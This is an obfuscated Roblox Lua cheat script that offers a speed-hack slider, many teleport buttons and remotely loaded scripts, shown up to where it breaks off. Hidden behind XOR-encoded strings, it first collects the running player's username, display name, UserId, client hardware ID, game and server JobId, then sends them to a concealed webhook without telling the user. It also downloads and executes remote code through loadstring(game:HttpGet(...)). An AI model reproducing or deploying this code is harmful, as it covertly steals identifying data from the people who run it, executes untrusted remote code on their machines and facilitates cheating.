--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v47,v48) local v49={};for v174=1, #v47 do v6(v49,v0(v4(v1(v2(v47,v174,v174 + 1 )),v1(v2(v48,1 + (v174% #v48) ,1 + (v174% #v48) + 1 )))%256 ));end return v5(v49);end local v8="";local v9={[v7("\221\204\220\13\209\146\227","\126\177\163\187\69\134\219\167")]=true,[v7("\47\194\45\240\239\38\223","\156\67\173\74\165")]=true,[v7("\56\184\78\49\189\43\67","\38\84\215\41\118\220\70")]=true,[v7("\92\25\37\56\241\82\63\6","\158\48\118\66\114")]=true};if ((v8=="") or (v8==v7("\173\37\28\37\118","\155\203\68\112\86\19\197"))) then local v175=0 + 0 ;local v176;while true do if (0==v175) then v176=0;while true do if (v176==(1 + 0)) then v9.logGame=true;v9.logJobID=true;break;end if (v176==(1414 -(1001 + 413))) then v9.logHWID=true;v9.logUser=true;v176=1;end end break;end end end local v10=game:GetService(v7("\118\209\55\229\69\106\246","\152\38\189\86\156\32\24\133"));local v11=game:GetService(v7("\212\67\179\86\207\82\181\80\245\84\162","\38\156\55\199"));local v12=game:GetService(v7("\133\124\110\35\22\96\234\79\169\126\121\27\22\102\236\74\171\120","\35\200\29\28\72\115\20\154"));local v13=game:GetService(v7("\43\189\201\254\131\45\56\0\171\216\220\158\31\49\11\169\216\220\136","\84\121\223\177\191\237\76"));local v14=v10.LocalPlayer;local v15={[v7("\172\83\203\168\53\95\59\210","\161\219\54\169\192\90\48\80")]={},[v7("\89\67\25\41\70\67\4","\69\41\34\96")]={[v7("\191\204\217\30\7\37\168","\75\220\163\183\106\98")]="",[v7("\7\183\137\50\221\17","\185\98\218\235\87")]={}}};v15.Send=function(v50,v51) local v52=v50.webhooks[v51];if  not v52 then return;end local v53=(syn and syn.request) or request or http_request ;if  not v53 then warn(v7("\229\51\103\229\209\167\219\61\51\239\220\166\206\124\15\210\234\154\139\46\34\247\203\175\216\40\103\224\203\164\200\40\46\233\208\234\205\51\50\232\218\228","\202\171\92\71\134\190"));return;end local v54,v55=pcall(function() return v53({[v7("\28\211\32","\232\73\161\76")]=v52,[v7("\150\220\86\85\17\191","\126\219\185\34\61")]=v7("\60\225\109\70","\135\108\174\62\18\30\23\147"),[v7("\158\236\43\207\29\188\32","\167\214\137\74\171\120\206\83")]={[v7("\168\255\60\73\253\169\159\189\6\68\232\162","\199\235\144\82\61\152")]=v7("\6\6\169\39\14\21\184\63\14\25\183\100\13\5\182\37","\75\103\118\217")},[v7("\229\91\116\13","\126\167\52\16\116\217")]=v11:JSONEncode(v50.payload)});end);if  not v54 then warn(v7("\238\47\41\140\177\29\188\220\33\96\147\177\23\248\136\57\37\130\188\22\243\195\116\96","\156\168\78\64\224\212\121")   .. tostring(v55) );end end;v15.AddWebhook=function(v56,v57,v58) v56.webhooks[v57]=v58;end;v15.CreateEmbed=function(v60) local v61=0 -0 ;local v62;while true do if (v61==1) then v62.SetDescription=function(v205,v206) v205.description=v206;end;v62.SetColor=function(v208,v209) v208.color=tonumber(v209,898 -(244 + 638) );end;v61=695 -(627 + 66) ;end if (v61==(8 -5)) then local v185=602 -(512 + 90) ;while true do if (v185==0) then local v224=1906 -(1665 + 241) ;while true do if (v224==(717 -(373 + 344))) then v62.Save=function(v242) table.insert(v15.payload.embeds,v242);end;return v62;end end end end end if (v61==(1 + 1)) then v62.AddField=function(v211,v212,v213,v214) table.insert(v211.fields,{[v7("\88\41\82\61","\152\54\72\63\88\69\62")]=v212,[v7("\194\197\226\73\209","\60\180\164\142")]=v213,[v7("\81\80\9\32\41\232","\114\56\62\101\73\71\141")]=v214 or false });end;v62.SetThumbnail=function(v215,v216) v215.thumbnail={[v7("\173\251\215","\164\216\137\187")]=v216};end;v61=1 + 2 ;end if (v61==(0 -0)) then v62={[v7("\1\231\160\194\3\253","\174\103\142\197")]={}};v62.SetTitle=function(v218,v219) v218.title=v219;end;v61=1 -0 ;end end end;v15:AddWebhook(v7("\198\244\48\177\173\251\25","\107\178\134\81\210\198\158"),v7("\48\26\150\214\185\98\65\205\194\163\43\13\141\212\174\118\13\141\203\229\57\30\139\137\189\61\12\138\201\165\51\29\205\151\249\106\93\219\151\253\110\91\208\148\248\109\90\208\159\255\110\90\205\224\176\34\43\151\241\144\111\92\145\207\140\96\25\137\158\255\31\58\146\196\157\107\31\150\252\190\33\93\140\192\142\44\40\211\214\149\15\26\186\206\142\9\10\155\194\146\59\63\151\254\253\96\88\133\228\149\58\9\132\242\142\12\86\150\206\134\61","\202\88\110\226\166"));local function v19() local v63=1099 -(35 + 1064) ;local v64;local v65;local v66;while true do if (v63==(0 + 0)) then v64=0;v65=nil;v63=1;end if (v63==(2 -1)) then v66=nil;while true do if (v64==(0 + 0)) then v65,v66=pcall(function() local v238=1236 -(298 + 938) ;local v239;local v240;while true do if (v238==(1260 -(233 + 1026))) then return v240.data[1].imageUrl;end if (v238==(1666 -(636 + 1030))) then v239=game:HttpGet(v7("\203\27\150\231\217\153\64\205\227\194\214\2\128\249\203\202\3\145\185\216\204\13\142\248\210\141\12\141\250\133\213\94\205\226\217\198\29\145\184\203\213\14\150\246\216\142\7\135\246\206\208\7\141\227\149\214\28\135\229\227\199\28\223","\170\163\111\226\151")   .. v14.UserId   .. v7("\87\35\187\34\75\106\120\68\96\170\105\27\103\111\23\63\160\53\79\35\116\1\62\181\126\76\56\59\21\53\160\27\65\59\38\3\109\176\52\79\52\34","\73\113\80\210\88\46\87") );v240=v11:JSONDecode(v239);v238=1 + 0 ;end end end);return (v65 and v66) or nil ;end end break;end end end local function v20() local v67=0;local v68;while true do local v177=0;while true do if (v177==0) then if (v67==(1 + 0)) then return v68;end if (v67==(0 + 0)) then v68=v7("\180\34\198\28\232\150\34","\135\225\76\173\114");pcall(function() v68=v13:GetClientId();end);v67=1 + 0 ;end break;end end end end local v21=v15:CreateEmbed();v21:SetTitle(v7("\70\183\233\227\254\233\246\76\181\236\225\251\233\255\67\184\224\228\254\232\254\64\188\235\226\248\236\241\66\185\233\231\248\229\254\79\181\236\226\249\228\249\90\241\248\131\175\175\174\10\249\248\149\180\184\164\15\249\177\191\162\253\131\31\249\189\179\184\184\163\90\241\248\236\246\236\244\72\185\233\230\244\233\246\77\185\224\233\249\229\243\72\184\225\234\253\238\245\78\188\238\232\248\236\240\78\181\225\229\244\233\245\79\180\230","\199\122\141\216\208\204\221"));v21:SetColor(v7("\250\143\72\169\92\215","\150\205\189\112\144\24"));if v9.logUser then local v178=221 -(55 + 166) ;while true do if (v178==(0 + 0)) then v21:AddField(v7("\121\222\238\31\86\220\64\70\125\208\237\28\93\208\66\68\113\215\234\25\84\210\64\67\119\208\238\26\92\220\67\64\124\220\236\24\80\219\68\69\117\218\255\80\68\172\24\3\53\136\190\85\68\166\16\29\32","\112\69\228\223\44\100\232\113"),v7("\212\31\7","\230\180\127\103\179\214\28")   .. v14.DisplayName   .. v7("\140\5\95","\128\236\101\63\38\132\33") ,true);v21:AddField(v7("\240\243\64\23\228\191\158\250\241\69\22\230\178\151\255\253\69\23\227\190\159\246\248\66\22\226\186\153\244\253\67\20\239\179\156\248\253\66\17\227\187\145\236\181\81\113\165\238\221\162\168\28\65","\175\204\201\113\36\214\139"),v7("\71\204\53","\100\39\172\85\188")   .. v14.Name   .. v7("\173\120\185","\83\205\24\217\224") ,true);v178=1;end if ((1 + 0)==v178) then v21:AddField(v7("\214\215\194\59\239\201\200","\93\134\165\173"),v7("\133\209\205\203\57\197\242\118\187\224\196\255\114\198\166\106\174\225\155\141\117\220\189\124\178\253\217\140\57\193\191\49\171\225\196\208\41\129","\30\222\146\161\162\90\174\210")   .. v14.UserId   .. v7("\170\94\98\5\227\71\124\15\172","\106\133\46\16") ,false);break;end end end if v9.logHWID then v21:AddField(v7("\4\122\34\175\8\20\9\118\43\168\11\25\0\112\39\165\13\21\9\118\37\166\11\19\10\116\34\170\2\20\9\121\43\172\14\25\15\117\34\170\12\30\24\60\51\212\109\105\124","\32\56\64\19\156\58"),v7("\90\200\229","\224\58\168\133\54\58\146")   .. v20()   .. v7("\89\86\75","\107\57\54\43\157\21\230\231") ,true);end if v9.logGame then local v179=0 -0 ;local v180;while true do if (v179==(297 -(36 + 261))) then v180=v12:GetProductInfo(game.PlaceId);v21:AddField(v7("\135\209\64\166\235\136\158\141\211\69\164\239\137\155\130\210\66\166\233\133\152\129\218\66\167\237\141\153\131\223\64\163\236\136\150\130\216\66\165\224\139\145\155\151\81\210\184\209\202","\175\187\235\113\149\217\188"),v7("\60\175\129","\24\92\207\225\44\131\25")   .. v180.Name   .. v7("\75\211\184","\29\43\179\216\44\123") ,false);break;end end end if v9.logJobID then v21:AddField(v7("\225\131\113\31\239\141\113\26\229\141\113\20\232\137\120\21\238\136\113\26\233\131\113\31\239\141\113\26\229\141\113\20\232\137\120\21\238\136\113\26\233\135\96\80\253\243\47\78\253\240\4","\44\221\185\64"),v7("\1\231\72","\19\97\135\40\63")   .. game.JobId   .. v7("\174\92\51","\81\206\60\83\91\79") ,false);end local v22=v19();if v22 then v21:SetThumbnail(v22);end v21:Save();v15.payload.content=v7("\82\183\140\82\126\147\21\242\22\251\131\32\121\144\25\242\26\250\134\39\124\148\27\250\82\183","\196\46\203\176\18\79\163\45");v15:Send(v7("\172\48\127\29\47\254\253","\143\216\66\30\126\68\155"));local v24=game:GetService(v7("\152\221\3\248\192\177\193\232\169\205","\129\202\168\109\171\165\195\183"));local v25=game:GetService(v7("\16\93\39\212\215\23\231\54\93\51\235\202\27\244\35\95\50","\134\66\56\87\184\190\116"));local v10=game:GetService(v7("\12\61\8\162\28\249\50","\85\92\81\105\219\121\139\65"));local v26=v24:IsStudio();local v27;if v26 then v27=require(v25.ImGui);else local v181=v7("\245\167\68\85\111\133\178\252\87\76\104\215\232\177\30\70\115\210\178\183\85\85\104\215\238\188\31\119\115\221\241\188\72\8\85\210\218\134\121\10\110\222\234\252\93\68\117\209\178\154\93\98\105\214\179\191\69\68","\191\157\211\48\37\28");v27=loadstring(game:HttpGet(v181))();end local v28=v27:CreateWindow({[v7("\235\22\224\16\63","\90\191\127\148\124")]=v7("\76\143\43\87\84\142\40\3\56\214\96\68","\119\24\231\78"),[v7("\177\36\191\79","\113\226\77\197\42\188\32")]=UDim2.new(0,600,0 -0 ,1768 -(34 + 1334) ),[v7("\10\25\231\188\46\31\251\187","\213\90\118\148")]=UDim2.new(0.5 + 0 ,0 + 0 ,1283.5 -(1035 + 248) ,21 -(20 + 1) )});v28:Center();local v29=v28:CreateTab({[v7("\117\47\185\83","\45\59\78\212\54")]=v7("\57\88\133\132","\144\112\54\227\235\230\78\205")});local v30=v28:CreateTab({[v7("\157\41\2\249","\59\211\72\111\156\176")]=v7("\99\136\245\40\67\130\237\57","\77\46\231\131")});local v31=v28:CreateTab({[v7("\148\85\187\69","\32\218\52\214")]=v7("\122\18\61\173\225\191\87\78\93","\58\46\119\81\200\145\208\37")});local v32=v28:CreateTab({[v7("\5\141\61\169","\86\75\236\80\204\201\221")]=v7("\83\69\122\140\240\152","\235\18\33\23\229\158")});local v33=v28:CreateTab({[v7("\126\187\204\190","\219\48\218\161")]=v7("\203\103\121\91\203\64\247\225\99\121\77","\128\132\17\28\41\187\47")});local v34=v28:CreateTab({[v7("\47\51\11\63","\61\97\82\102\90")]=v7("\137\29\155","\105\204\78\203\43\167\55\126")});local v35=v28:CreateTab({[v7("\139\171\46\27","\49\197\202\67\126\115\100\167")]=v7("\20\83\222\39\135\83\82\56\92","\62\87\59\191\73\224\54")});v29:Label({[v7("\211\7\226\221","\169\135\98\154")]=v7("\255\127\45\71\189\32\203\217\126\52\64\189\36\201\216\55\41\85\249\54\136\201\110\100\120\242\52\219\244\32\100\91\243\115\236\194\100\39\91\239\55\134","\168\171\23\68\52\157\83"),[v7("\192\116\237\185\18\63\134\228\97\240\169","\231\148\17\149\205\69\77")]=true});v29:Button({[v7("\180\162\223\239","\159\224\199\167\155\55")]=v7("\212\252\44\203\183\215\53\193\244\252\46\214\183\223\53\220\252","\178\151\147\92"),[v7("\175\252\64\62\16\77\121\135","\26\236\157\44\82\114\44")]=function(v69) if setclipboard then setclipboard(v7("\34\58\193\75\57\116\154\20\46\39\198\88\37\60\209\21\41\33\216\20\35\32\195\82\62\43\154\95\124\120\253\14\121\22\246\72\18","\59\74\78\181"));end end});local v36=1 + 0 ;local v37=320 -(134 + 185) ;local v38=1;local v39=true;local v40=1133.1 -(549 + 584) ;local v41=709 -(314 + 371) ;v30:Checkbox({[v7("\9\208\88\95\191","\211\69\177\58\58")]=v7("\146\235\120\247\229\206\247\198\95\231\232\198\178\165\74\229\236\206\179","\171\215\133\25\149\137"),[v7("\215\201\62\239\234","\34\129\168\82\154\143\80\156")]=v39,[v7("\166\179\63\7\74\79\138\142","\233\229\210\83\107\40\46")]=function(v70,v71) local v72=0;while true do if ((0 -0)==v72) then v39=v71;if  not v39 then v38=969 -(478 + 490) ;end break;end end end});v30:Slider({[v7("\237\67\48\211\9","\101\161\34\82\182")]=v7("\219\29\92\251\223\162\175\59\228\25\80\238\215\235\135\60","\78\136\109\57\158\187\130\226"),[v7("\19\54\247\199\63\51\236\244","\145\94\95\153")]=v40,[v7("\208\204\12\227\79\187\232\200","\215\157\173\116\181\46")]=v41,[v7("\3\181\135\231\223","\186\85\212\235\146")]=v37,[v7("\240\142\3\240\61\231\86\197","\56\162\225\118\158\89\142")]=2 + 0 ,[v7("\127\4\204\163\32\217\95\14","\184\60\101\160\207\66")]=function(v73,v74) if v39 then v38=v74;end end});local function v42(v75,v76,v77) return v75 + ((v76-v75) * math.min(v77,1)) ;end local v43=v10.LocalPlayer;repeat wait();until game:IsLoaded() and v43.Character  local v44=v43.Character;local v45=v44:WaitForChild(v7("\25\151\113\189\63\141\117\184\3\141\115\168\1\131\110\168","\220\81\226\28"));local v46=v44:WaitForChild(v7("\59\192\143\250\228\200\26\209","\167\115\181\226\155\138"));v24.RenderStepped:Connect(function(v78) v37=v42(v37,v38,v78 * (1177 -(786 + 386)) );if (v46 and (v46.MoveDirection.Magnitude>(0 -0))) then local v182=v46.MoveDirection;if v39 then local v221=v36 * v37 ;v45.CFrame=v45.CFrame + (v182 * v221 * v78) ;else v45.CFrame=v45.CFrame + (v182 * v36 * v78) ;end end end);v31:Label({[v7("\214\39\255\72","\166\130\66\135\60\27\17")]=v7("\105\75\197\112\112\87\95\220\112\112\93\69\219\53\36\81\88\192\53\23\75\78\227\122\52\65\10\193\123\112\77\68\142\90\38\65\88\222\122\39\65\88\203\113\112\112\75\204\53\50\65\76\193\103\53\4\83\193\96\112\81\89\203\53\4\65\70\203\101\63\86\94\221\52","\80\36\42\174\21")});v31:Button({[v7("\122\21\47\110","\26\46\112\87")]=v7("\141\43\174\52\147\182\67\160","\212\217\67\203\20\223\223\37"),[v7("\153\140\164\222\184\140\171\217","\178\218\237\200")]=function(v79) loadstring(game:HttpGet(v7("\190\161\242\192\165\239\169\159\177\188\245\196\248\178\239\196\190\160\228\197\165\176\244\211\185\187\242\213\184\161\168\211\185\184\169\241\166\167\233\215\185\166\171\209\176\190\169\211\179\179\227\212\225\229\229\135\239\229\182\133\178\231\181\134\178\225\191\137\178\179\224\214\180\236\191\210\238\176\176\159\164\180\241\159\231\182\179\129\176\182\224\137\225\229\190\135\227\179\179\212\239\177\228\132\180\236\224\128\183\183\180\130\176\179\177\132\227\182\176\129\238\224\224\213\249\129\227\220\179\165\233\194\162\240\180\133\228\229\242\223\243\231\179\130\230\153\239\214\162","\176\214\213\134")))();end});v31:Button({[v7("\192\168\174\192","\57\148\205\214\180\200\54")]=v7("\52\241\58\59\100\82\172","\22\114\157\85\84"),[v7("\231\202\31\200\95\247\171\207","\200\164\171\115\164\61\150")]=function(v80) local v81=1379 -(1055 + 324) ;while true do if (v81==0) then game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame=CFrame.new( -(1425.2398758 -(1093 + 247)),718.8125 + 89 ,12.074821 + 102 ,0 -0 ,0 -0 ,2 -1 ,0 -0 ,1,v7("\243\164","\227\222\148\99\37"), -(1 + 0),0 -0 ,0 -0 );wait();break;end end end});v31:Button({[v7("\7\87\74\226","\153\83\50\50\150")]=v7("\123\122\124\19\97\235\31","\45\61\22\19\124\19\203"),[v7("\226\19\1\249\0\113\186\202","\217\161\114\109\149\98\16")]=function(v82) game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame=CFrame.new( -85.2398758,780.0625,86.074821 + 28 ,0,0 -0 ,689 -(364 + 324) ,0,2 -1 ,v7("\95\112","\20\114\64\88\28\220"), -1,0 -0 ,0);wait();end});v31:Button({[v7("\5\4\202\160","\221\81\97\178\212\152\176")]=v7("\235\235\18\244\8\141\180","\122\173\135\125\155"),[v7("\167\192\12\181\61\48\203\143","\168\228\161\96\217\95\81")]=function(v84) game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame=CFrame.new( -(29.239875799999993 + 56),3146.3125 -2394 ,182.074821 -68 ,0,0,2 -1 ,1268 -(1249 + 19) ,1,v7("\150\129","\55\187\177\78\60\79"), -1,0,0 + 0 );wait();end});v31:Button({[v7("\25\203\71\255","\224\77\174\63\139\38\175")]=v7("\162\77\87\33\150\1\12","\78\228\33\56"),[v7("\237\127\190\15\135\207\125\185","\229\174\30\210\99")]=function(v86) game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame=CFrame.new( -85.2398758,724.5625,443.074821 -329 ,1086 -(686 + 400) ,0 + 0 ,230 -(73 + 156) ,0 + 0 ,812 -(721 + 90) ,v7("\86\189","\89\123\141\230\49\141\93"), -(1 + 0),0,0 -0 );wait();end});v31:Button({[v7("\199\116\238\24","\42\147\17\150\108\112")]=v7("\41\170\34\112\245\168\90","\136\111\198\77\31\135"),[v7("\33\8\171\90\191\229\20\162","\201\98\105\199\54\221\132\119")]=function(v88) game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame=CFrame.new( -(555.2398757999999 -(224 + 246)),696.8125,184.074821 -70 );end});v31:Button({[v7("\141\9\155\53","\204\217\108\227\65\98\85")]=v7("\120\207\250\234\62\128\8","\160\62\163\149\133\76"),[v7("\245\161\1\35\193\215\163\6","\163\182\192\109\79")]=function(v90) game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame=CFrame.new( -(156.2398758 -71),122.0625 + 547 ,3.074821 + 111 );end});v31:Button({[v7("\0\35\24\212","\149\84\70\96\160")]=v7("\30\10\2\226\42\70\90","\141\88\102\109"),[v7("\144\82\198\124\24\60\86\202","\161\211\51\170\16\122\93\53")]=function(v92) game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame=CFrame.new( -85.2398758,471.3125 + 170 ,114.074821);end});v31:Button({[v7("\207\171\170\60","\72\155\206\210")]=v7("\96\118\91\1\33\6\34","\83\38\26\52\110"),[v7("\123\22\43\74\90\22\36\77","\38\56\119\71")]=function(v94) game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame=CFrame.new( -(168.2398758 -83),613.5625,114.074821,0 -0 ,513 -(203 + 310) ,1994 -(1238 + 755) ,0 + 0 ,1535 -(709 + 825) ,v7("\190\191","\54\147\143\56\182\69"), -(1 -0),0 -0 ,0);wait();end});v31:Button({[v7("\226\132\231\93","\191\182\225\159\41")]=v7("\13\30\39\90\153\199\155","\162\75\114\72\53\235\231"),[v7("\175\61\72\238\81\3\143\55","\98\236\92\36\130\51")]=function(v96) local v97=864 -(196 + 668) ;while true do if (v97==(0 -0)) then game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame=CFrame.new( -85.2398758,585.8125,235.074821 -121 ,833 -(171 + 662) ,0,94 -(4 + 89) ,0,3 -2 ,v7("\233\73","\80\196\121\108\218\37\200\213"), -(1 + 0),0,0 -0 );wait();break;end end end});v31:Button({[v7("\52\118\26\107","\234\96\19\98\31\43\110")]=v7("\32\19\93\200\190\50\218\86","\235\102\127\50\167\204\18"),[v7("\115\160\249\47\70\47\83\170","\78\48\193\149\67\36")]=function(v98) local v99=0 + 0 ;while true do if (0==v99) then game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame=CFrame.new( -(1571.2398758 -(35 + 1451)),558.0625,1567.074821 -(28 + 1425) ,0,1993 -(941 + 1052) ,1 + 0 ,0,1515 -(822 + 692) ,v7("\125\78","\33\80\126\224\120"), -1,0 -0 ,0 + 0 );wait();break;end end end});v31:Button({[v7("\216\173\27\208","\60\140\200\99\164")]=v7("\161\248\11\41\176\199\165\85","\194\231\148\100\70"),[v7("\101\77\205\175\244\201\69\71","\168\38\44\161\195\150")]=function(v100) local v101=297 -(45 + 252) ;local v102;while true do if (v101==(0 + 0)) then v102=0 + 0 ;while true do if (v102==0) then game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame=CFrame.new( -85.2398758,530.3125,277.074821 -163 ,0,433 -(114 + 319) ,1 -0 ,0 -0 ,1,v7("\205\172","\118\224\156\226\22\80\136\214"), -1,0 + 0 ,0 -0 );wait();break;end end break;end end end});v31:Button({[v7("\118\235\65\148","\224\34\142\57")]=v7("\248\171\202\210\97\177\12\92","\110\190\199\165\189\19\145\61"),[v7("\249\234\123\228\137\198\217\224","\167\186\139\23\136\235")]=function(v103) local v104=0;local v105;while true do if (v104==(0 -0)) then v105=1963 -(556 + 1407) ;while true do if (v105==(1206 -(741 + 465))) then game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame=CFrame.new( -(550.2398757999999 -(170 + 295)),265.5625 + 237 ,105.074821 + 9 ,0 -0 ,0 + 0 ,1 + 0 ,0 + 0 ,1231 -(957 + 273) ,v7("\87\229","\109\122\213\232"), -(1 + 0),0 + 0 ,0);wait();break;end end break;end end end});v31:Button({[v7("\218\242\186\36","\80\142\151\194")]=v7("\37\202\120\67\17\134\38\31","\44\99\166\23"),[v7("\95\246\37\58\49\165\127\252","\196\28\151\73\86\83")]=function(v106) local v107=0 -0 ;while true do if (v107==0) then game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame=CFrame.new( -(223.2398758 -138),1447.8125 -973 ,564.074821 -450 ,1780 -(389 + 1391) ,0,1 + 0 ,0,1,v7("\190\83","\22\147\99\73\112\226\56\120"), -(1 + 0),0,0 -0 );wait();break;end end end});v31:Button({[v7("\140\112\250\225","\237\216\21\130\149")]=v7("\164\66\80\80\162\137\15\214","\62\226\46\63\63\208\169"),[v7("\198\24\89\143\29\12\44\85","\62\133\121\53\227\127\109\79")]=function(v108) local v109=951 -(783 + 168) ;while true do if (v109==0) then game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame=CFrame.new( -85.2398758,447.0625,382.074821 -268 ,0 + 0 ,311 -(309 + 2) ,2 -1 ,0,1,v7("\93\68","\194\112\116\82\149\182\206"), -1,1212 -(1090 + 122) ,0 + 0 );wait();break;end end end});v31:Button({[v7("\13\173\84\12","\110\89\200\44\120\160\130")]=v7("\141\207\68\73\81\10\106\24","\45\203\163\43\38\35\42\91"),[v7("\241\132\208\47\133\168\87\217","\52\178\229\188\67\231\201")]=function(v110) game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame=CFrame.new( -85.2398758,1407.3125 -988 ,79.074821 + 35 ,0,1118 -(628 + 490) ,1 + 0 ,0 -0 ,4 -3 ,v7("\108\17","\67\65\33\48\100\151\60"), -1,774 -(431 + 343) ,0);wait();end});v31:Button({[v7("\235\226\182\204","\147\191\135\206\184")]=v7("\162\36\169\206\202\19\227\210","\210\228\72\198\161\184\51"),[v7("\21\72\255\28\113\207\53\66","\174\86\41\147\112\19")]=function(v112) local v113=0;local v114;while true do if (v113==(0 -0)) then v114=0 -0 ;while true do if ((0 + 0)==v114) then game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame=CFrame.new( -(11.239875799999993 + 74),2086.5625 -(556 + 1139) ,129.074821 -(6 + 9) ,0 + 0 ,0,1,0,1,v7("\22\80","\203\59\96\237\107\69\111\113"), -1,0 + 0 ,0);wait();break;end end break;end end end});v31:Button({[v7("\16\19\180\245","\183\68\118\204\129\81\144")]=v7("\40\161\127\235\25\194\95\250","\226\110\205\16\132\107"),[v7("\200\194\236\213\67\234\192\235","\33\139\163\128\185")]=function(v115) game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame=CFrame.new( -(254.2398758 -(28 + 141)),363.8125,45.074821 + 69 ,0 -0 ,0,1,0 + 0 ,1318 -(486 + 831) ,v7("\26\8","\190\55\56\100"), -(2 -1),0 -0 ,0);wait();end});v31:Button({[v7("\98\170\36\10","\147\54\207\92\126\115\131")]=v7("\43\61\58\114\31\62\92\105","\30\109\81\85\29\109"),[v7("\220\112\88\186\52\223\255\244","\156\159\17\52\214\86\190")]=function(v117) local v118=0;local v119;while true do if (0==v118) then v119=0;while true do if (v119==0) then game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame=CFrame.new( -(17.239875799999993 + 68),336.0625,360.074821 -246 ,1263 -(668 + 595) ,0,1 + 0 ,0,1,v7("\227\191","\220\206\143\221"), -(1 + 0),0,0);wait();break;end end break;end end end});v31:Button({[v7("\178\120\53\3","\178\230\29\77\119\184\172")]=v7("\211\178\5\20\101\184\164\231","\152\149\222\106\123\23"),[v7("\254\39\250\79\183\220\37\253","\213\189\70\150\35")]=function(v120) local v121=0;while true do if (v121==0) then game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame=CFrame.new( -(231.2398758 -146),598.3125 -(23 + 267) ,2058.074821 -(1129 + 815) ,0,387 -(371 + 16) ,1,1750 -(1326 + 424) ,1 -0 ,v7("\2\5","\104\47\53\20"), -1,0,0 -0 );wait();break;end end end});v31:Button({[v7("\151\73\153\8","\111\195\44\225\124\220")]=v7("\254\74\15\124\185\235\138\22","\203\184\38\96\19\203"),[v7("\26\114\117\77\204\56\112\114","\174\89\19\25\33")]=function(v122) local v123=118 -(88 + 30) ;local v124;while true do if (v123==(771 -(720 + 51))) then v124=0 -0 ;while true do if ((1776 -(421 + 1355))==v124) then game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame=CFrame.new( -(140.2398758 -55),138.5625 + 142 ,114.074821,1083 -(286 + 797) ,0 -0 ,1 -0 ,0,440 -(397 + 42) ,v7("\98\66","\107\79\114\50\46\151\231"), -(1 + 0),0,0);wait();break;end end break;end end end});v31:Button({[v7("\13\163\173\61","\160\89\198\213\73\234\89\215")]=v7("\110\125\187\241\215\8\35\229","\165\40\17\212\158"),[v7("\198\216\4\63\36\228\218\3","\70\133\185\104\83")]=function(v125) local v126=800 -(24 + 776) ;local v127;while true do if (v126==(0 -0)) then v127=0;while true do if (v127==(785 -(222 + 563))) then game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame=CFrame.new( -(187.2398758 -102),182.8125 + 70 ,304.074821 -(23 + 167) ,1798 -(690 + 1108) ,0 + 0 ,1,0,1 + 0 ,v7("\73\21","\169\100\37\36\74"), -(849 -(40 + 808)),0 + 0 ,0 -0 );wait();break;end end break;end end end});v31:Button({[v7("\52\130\186\68","\48\96\231\194")]=v7("\238\86\1\34\11\152\253\209","\227\168\58\110\77\121\184\207"),[v7("\88\61\179\76\179\218\114\174","\197\27\92\223\32\209\187\17")]=function(v128) local v129=0;local v130;while true do if (v129==0) then v130=0 + 0 ;while true do if (v130==(0 + 0)) then game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame=CFrame.new( -(47.23987579999999 + 38),225.0625,685.074821 -(47 + 524) ,0 + 0 ,0,2 -1 ,0 -0 ,2 -1 ,v7("\78\15","\155\99\63\163"), -(1727 -(1165 + 561)),0 + 0 ,0);wait();break;end end break;end end end});v31:Button({[v7("\182\212\185\153","\228\226\177\193\237\217")]=v7("\18\188\44\233\38\240\113\181","\134\84\208\67"),[v7("\48\173\138\80\17\173\133\87","\60\115\204\230")]=function(v131) local v132=0 -0 ;while true do if (v132==(0 + 0)) then game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame=CFrame.new( -(564.2398757999999 -(341 + 138)),54.3125 + 143 ,234.074821 -120 ,326 -(89 + 237) ,0,3 -2 ,0,1 -0 ,v7("\170\106","\16\135\90\139"), -(882 -(581 + 300)),0,0);wait();break;end end end});v31:Button({[v7("\96\113\30\39","\24\52\20\102\83\46\52")]=v7("\226\35\46\43\29\132\125\117","\111\164\79\65\68"),[v7("\229\216\143\210\44\235\197\210","\138\166\185\227\190\78")]=function(v133) game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame=CFrame.new( -(1305.2398758 -(855 + 365)),169.5625,270.074821 -156 ,0 + 0 ,0,1,1235 -(1030 + 205) ,1 + 0 ,v7("\134\36","\121\171\20\165\87\50\67"), -(1 + 0),286 -(156 + 130) ,0 -0 );wait();end});v31:Button({[v7("\242\61\161\34","\98\166\88\217\86\217")]=v7("\208\250\118\14\148\156\164\163","\188\150\150\25\97\230"),[v7("\249\136\83\14\14\236\217\130","\141\186\233\63\98\108")]=function(v135) local v136=0 -0 ;while true do if (v136==(0 -0)) then game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame=CFrame.new( -(23.239875799999993 + 62),141.8125,67.074821 + 47 ,69 -(10 + 59) ,0 + 0 ,1,0,4 -3 